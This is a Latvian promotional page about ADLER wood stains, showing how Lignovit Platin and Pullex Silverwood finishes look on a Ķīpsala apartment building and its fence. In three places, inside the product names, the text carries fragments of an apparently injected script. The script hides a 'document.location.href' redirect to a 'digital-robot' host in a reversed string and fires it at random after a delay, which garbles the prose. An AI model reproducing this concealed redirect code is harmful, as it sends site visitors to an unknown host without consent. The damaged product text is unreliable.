Koksnes
skaistumam
un izturībai

Platin apdare lauž gaismu Ķīpsalā

Dzīvokļu māja Zvejnieku ielā, Ķīpsalā parāda kādu rezultātu var sasniegt apvienojot arhitekta redzējumu un koksnes apdares materiāla sniegtās iespējas.

ADLER Lignovit Platin, tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tonis Pyritgrau  – tas ir tas, kas rada neatkārtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tojamās gaismas-ēnas spēles uz koka brusiņu klātās fasādes. PLATIN lazūrām ir perlamutra efekts – atkarībā no gaismas krišanas leņķa tas atstarojas citādāk. Fasāde veinlaicīgi var izskatīties no zeltaini brūnas līdz metāliski zilai. Tas ir jāredz!

Atkarībā no gaismas krīšanas leņķa koks izskatās zeltaini brūns….

… vai metāliski violets.

ADLER Pullex Silverwood Silber tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tonī krāsotais žogs izskatās jau sen kā saulē dabiski izbalējis   – tā uzdevums ir vēl vairāk izcelt aiz tā esošas ēkas modernismu un lazūras vizuļojošo efektu.

ADLER Pullex Silverwood apdares spēj piešķirt jaunam žogam saulē izbalējušas koksnes dabisko pievilcību.

Vairāk par PLATIN un SILVERWOOD lazūrām lasiet produktu sadaļā.